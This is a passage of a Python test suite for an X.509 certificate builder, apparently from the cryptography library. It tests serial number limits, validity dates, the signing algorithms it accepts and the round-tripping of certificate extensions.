x509.CertificateBuilder().serial_number(10.0)
def test_serial_number_must_be_non_negative(self):
with pytest.raises(ValueError):
x509.CertificateBuilder().serial_number(-1)
def test_serial_number_must_be_positive(self):
with pytest.raises(ValueError):
x509.CertificateBuilder().serial_number(0)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_minimal_serial_number(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
1
).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'RU'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'RU'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
cert = builder.sign(subject_private_key, hashes.SHA256(), backend)
assert cert.serial_number == 1
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_biggest_serial_number(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
(1 << 159) - 1
).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'RU'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'RU'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
cert = builder.sign(subject_private_key, hashes.SHA256(), backend)
assert cert.serial_number == (1 << 159) - 1
def test_serial_number_must_be_less_than_160_bits_long(self):
with pytest.raises(ValueError):
x509.CertificateBuilder().serial_number(1 << 159)
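# RFC 5280 caps serial numbers at 20 octets, and they must be positive, so the
# largest value the builder accepts is (1 << 159) - 1.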
def test_serial_number_may_only_be_set_once(self):
builder = x509.CertificateBuilder().serial_number(10)
with pytest.raises(ValueError):
builder.serial_number(20)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_aware_not_valid_after(self, backend):
time = datetime.datetime(2012, 1, 16, 22, 43)
tz = pytz.timezone("US/Pacific")
time = tz.localize(time)
utc_time = datetime.datetime(2012, 1, 17, 6, 43)
private_key = RSA_KEY_2048.private_key(backend)
cert_builder = x509.CertificateBuilder().not_valid_after(time)
cert_builder = cert_builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
utc_time - datetime.timedelta(days=365)
)
cert = cert_builder.sign(private_key, hashes.SHA256(), backend)
assert cert.not_valid_after == utc_time
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_earliest_time(self, backend):
time = datetime.datetime(1950, 1, 1)
private_key = RSA_KEY_2048.private_key(backend)
cert_builder = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
time
).not_valid_after(
time
)
cert = cert_builder.sign(private_key, hashes.SHA256(), backend)
assert cert.not_valid_before == time
assert cert.not_valid_after == time
parsed = _parse_cert(cert.public_bytes(serialization.Encoding.DER))
assert parsed.not_before_tag == UTC_TIME
assert parsed.not_after_tag == UTC_TIME
def test_invalid_not_valid_after(self):
with pytest.raises(TypeError):
x509.CertificateBuilder().not_valid_after(104204304504)
with pytest.raises(TypeError):
x509.CertificateBuilder().not_valid_after(datetime.time())
with pytest.raises(ValueError):
x509.CertificateBuilder().not_valid_after(
datetime.datetime(1940, 8, 10)
)
def test_not_valid_after_may_only_be_set_once(self):
builder = x509.CertificateBuilder().not_valid_after(
datetime.datetime.now()
)
with pytest.raises(ValueError):
builder.not_valid_after(
datetime.datetime.now()
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_aware_not_valid_before(self, backend):
time = datetime.datetime(2012, 1, 16, 22, 43)
tz = pytz.timezone("US/Pacific")
time = tz.localize(time)
utc_time = datetime.datetime(2012, 1, 17, 6, 43)
private_key = RSA_KEY_2048.private_key(backend)
cert_builder = x509.CertificateBuilder().not_valid_before(time)
cert_builder = cert_builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_after(
utc_time + datetime.timedelta(days=366)
)
cert = cert_builder.sign(private_key, hashes.SHA256(), backend)
assert cert.not_valid_before == utc_time
def test_invalid_not_valid_before(self):
with pytest.raises(TypeError):
x509.CertificateBuilder().not_valid_before(104204304504)
with pytest.raises(TypeError):
x509.CertificateBuilder().not_valid_before(datetime.time())
with pytest.raises(ValueError):
x509.CertificateBuilder().not_valid_before(
datetime.datetime(1940, 8, 10)
)
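# Validity bounds must be datetime.datetime instances no earlier than
# 1950-01-01 (the start of the UTCTime range); integers, datetime.time objects
# and pre-1950 dates are all rejected.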
def test_not_valid_before_may_only_be_set_once(self):
builder = x509.CertificateBuilder().not_valid_before(
datetime.datetime.now()
)
with pytest.raises(ValueError):
builder.not_valid_before(
datetime.datetime.now()
)
def test_add_extension_checks_for_duplicates(self):
builder = x509.CertificateBuilder().add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
)
with pytest.raises(ValueError):
builder.add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
)
def test_add_invalid_extension_type(self):
builder = x509.CertificateBuilder()
with pytest.raises(TypeError):
builder.add_extension(object(), False)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.parametrize(
"algorithm",
[
object(), None
]
)
def test_sign_with_unsupported_hash(self, algorithm, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(TypeError):
builder.sign(private_key, algorithm, backend)
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_sign_with_unsupported_hash_ed25519(self, backend):
private_key = ed25519.Ed25519PrivateKey.generate()
builder = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_sign_with_unsupported_hash_ed448(self, backend):
private_key = ed448.Ed448PrivateKey.generate()
builder = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
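# Ed25519 and Ed448 keys hash internally as part of signing, so sign() must be
# called with algorithm=None for them; supplying a hash raises ValueError.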
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_rsa_with_md5(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
cert = builder.sign(private_key, hashes.MD5(), backend)
assert isinstance(cert.signature_hash_algorithm, hashes.MD5)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_dsa_with_md5(self, backend):
private_key = DSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.MD5(), backend)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_ec_with_md5(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = EC_KEY_SECP256R1.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.MD5(), backend)
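# MD5 signing is only permitted for RSA keys (and only when the OpenSSL build
# still supports MD5); DSA and ECDSA keys reject it with ValueError.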
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_dsa_private_key(self, backend):
issuer_private_key = DSA_KEY_2048.private_key(backend)
subject_private_key = DSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_ec_private_key(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
issuer_private_key = ec.generate_private_key(ec.SECP256R1(), backend)
subject_private_key = ec.generate_private_key(ec.SECP256R1(), backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_ed25519(self, backend):
issuer_private_key = ed25519.Ed25519PrivateKey.generate()
subject_private_key = ed25519.Ed25519PrivateKey.generate()
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, None, backend)
issuer_private_key.public_key().verify(
cert.signature, cert.tbs_certificate_bytes
)
assert cert.signature_algorithm_oid == SignatureAlgorithmOID.ED25519
assert cert.signature_hash_algorithm is None
assert isinstance(cert.public_key(), ed25519.Ed25519PublicKey)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
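# For an Ed25519-signed certificate signature_hash_algorithm is None, and the
# issuer's Ed25519 public key verifies the signature directly over
# tbs_certificate_bytes.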
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_cert_with_public_ed25519_rsa_sig(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = ed25519.Ed25519PrivateKey.generate()
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
issuer_private_key.public_key().verify(
cert.signature, cert.tbs_certificate_bytes, padding.PKCS1v15(),
cert.signature_hash_algorithm
)
assert cert.signature_algorithm_oid == (
SignatureAlgorithmOID.RSA_WITH_SHA256
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA256)
assert isinstance(cert.public_key(), ed25519.Ed25519PublicKey)
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_ed448(self, backend):
issuer_private_key = ed448.Ed448PrivateKey.generate()
subject_private_key = ed448.Ed448PrivateKey.generate()
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, None, backend)
issuer_private_key.public_key().verify(
cert.signature, cert.tbs_certificate_bytes
)
assert cert.signature_algorithm_oid == SignatureAlgorithmOID.ED448
assert cert.signature_hash_algorithm is None
assert isinstance(cert.public_key(), ed448.Ed448PublicKey)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_cert_with_public_ed448_rsa_sig(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = ed448.Ed448PrivateKey.generate()
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
issuer_private_key.public_key().verify(
cert.signature, cert.tbs_certificate_bytes, padding.PKCS1v15(),
cert.signature_hash_algorithm
)
assert cert.signature_algorithm_oid == (
SignatureAlgorithmOID.RSA_WITH_SHA256
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA256)
assert isinstance(cert.public_key(), ed448.Ed448PublicKey)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_rsa_key_too_small(self, backend):
issuer_private_key = RSA_KEY_512.private_key(backend)
subject_private_key = RSA_KEY_512.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
with pytest.raises(ValueError):
builder.sign(issuer_private_key, hashes.SHA512(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.parametrize(
"add_ext",
[
x509.SubjectAlternativeName(
[
# These examples exist to verify compatibility with
# certificates that contain UTF-8 encoded data in IA5String fields
x509.DNSName._init_without_validation(u'a\xedt\xe1s.test'),
x509.RFC822Name._init_without_validation(
u'test@a\xedt\xe1s.test'
),
x509.UniformResourceIdentifier._init_without_validation(
u'http://a\xedt\xe1s.test'
),
]
),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[u"http://other.com/cps"]
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
None
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[
u"http://example.com/cps",
u"http://other.com/cps",
x509.UserNotice(
x509.NoticeReference(u"my org", [1, 2, 3, 4]),
u"thing"
)
]
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[
u"http://example.com/cps",
x509.UserNotice(
x509.NoticeReference(u"UTF8\u2122'", [1, 2, 3, 4]),
u"We heart UTF8!\u2122"
)
]
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[x509.UserNotice(None, u"thing")]
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[
x509.UserNotice(
x509.NoticeReference(u"my org", [1, 2, 3, 4]),
None
)
]
)
]),
x509.IssuerAlternativeName([
x509.DNSName(u"myissuer"),
x509.RFC822Name(u"email@domain.com"),
]),
x509.ExtendedKeyUsage([
ExtendedKeyUsageOID.CLIENT_AUTH,
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CODE_SIGNING,
]),
x509.InhibitAnyPolicy(3),
x509.TLSFeature([x509.TLSFeatureType.status_request]),
x509.TLSFeature([x509.TLSFeatureType.status_request_v2]),
x509.TLSFeature([
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2
]),
x509.NameConstraints(
permitted_subtrees=[
x509.IPAddress(ipaddress.IPv4Network(u"192.168.0.0/24")),
x509.IPAddress(ipaddress.IPv4Network(u"192.168.0.0/29")),
x509.IPAddress(ipaddress.IPv4Network(u"127.0.0.1/32")),
x509.IPAddress(ipaddress.IPv4Network(u"8.0.0.0/8")),
x509.IPAddress(ipaddress.IPv4Network(u"0.0.0.0/0")),
x509.IPAddress(
ipaddress.IPv6Network(u"FF:0:0:0:0:0:0:0/96")
),
x509.IPAddress(
ipaddress.IPv6Network(u"FF:FF:0:0:0:0:0:0/128")
),
],
excluded_subtrees=[x509.DNSName(u"name.local")]
),
x509.NameConstraints(
permitted_subtrees=[
x509.IPAddress(ipaddress.IPv4Network(u"0.0.0.0/0")),
],
excluded_subtrees=None
),
x509.NameConstraints(
permitted_subtrees=None,
excluded_subtrees=[x509.DNSName(u"name.local")]
),
x509.PolicyConstraints(
require_explicit_policy=None,
inhibit_policy_mapping=1
),
x509.PolicyConstraints(
require_explicit_policy=3,
inhibit_policy_mapping=1
),
x509.PolicyConstraints(
require_explicit_policy=0,
inhibit_policy_mapping=None
),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName([
x509.NameAttribute(
NameOID.COMMON_NAME,
u"indirect CRL for indirectCRL CA3"
),
]),
reasons=None,
crl_issuer=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME,
u"Test Certificates 2011"
),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME,
u"indirectCRL CA3 cRLIssuer"
),
])
)],
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
])
)],
relative_name=None,
reasons=None,
crl_issuer=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(
NameOID.ORGANIZATION_NAME,
u"cryptography Testing"
),
])
)],
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
u"http://myhost.com/myca.crl"
),
x509.UniformResourceIdentifier(
u"http://backup.myhost.com/myca.crl"
)
],
relative_name=None,
reasons=frozenset([
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise
]),
crl_issuer=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography CA"
),
])
)],
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=[x509.UniformResourceIdentifier(
u"http://domain.com/some.crl"
)],
relative_name=None,
reasons=frozenset([
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.superseded,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.cessation_of_operation,
x509.ReasonFlags.aa_compromise,
x509.ReasonFlags.certificate_hold,
]),
crl_issuer=None
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=None,
relative_name=None,
reasons=None,
crl_issuer=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography CA"
),
])
)],
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=[x509.UniformResourceIdentifier(
u"http://domain.com/some.crl"
)],
relative_name=None,
reasons=frozenset([x509.ReasonFlags.aa_compromise]),
crl_issuer=None
)
]),
x509.FreshestCRL([
x509.DistributionPoint(
full_name=[x509.UniformResourceIdentifier(
u"http://domain.com/some.crl"
)],
relative_name=None,
reasons=frozenset([
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.superseded,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.cessation_of_operation,
x509.ReasonFlags.aa_compromise,
x509.ReasonFlags.certificate_hold,
]),
crl_issuer=None
)
]),
x509.FreshestCRL([
x509.DistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName([
x509.NameAttribute(
NameOID.COMMON_NAME,
u"indirect CRL for indirectCRL CA3"
),
]),
reasons=None,
crl_issuer=None,
)
]),
x509.FreshestCRL([
x509.DistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName([
x509.NameAttribute(
NameOID.COMMON_NAME,
u"indirect CRL for indirectCRL CA3"
),
x509.NameAttribute(
NameOID.COUNTRY_NAME,
u"US"
),
]),
reasons=None,
crl_issuer=None,
)
]),
]
)
def test_ext(self, add_ext, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
cert = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
).public_key(
subject_private_key.public_key()
).serial_number(
123
).add_extension(
add_ext, critical=False
).sign(issuer_private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_class(type(add_ext))
assert ext.critical is False
assert ext.value == add_ext
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_key_usage(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
cert = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
).public_key(
subject_private_key.public_key()
).serial_number(
123
).add_extension(
x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False
),
critical=False
).sign(issuer_private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert ext.critical is False
assert ext.value == x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_ca_request_with_path_length_none(self, backend):
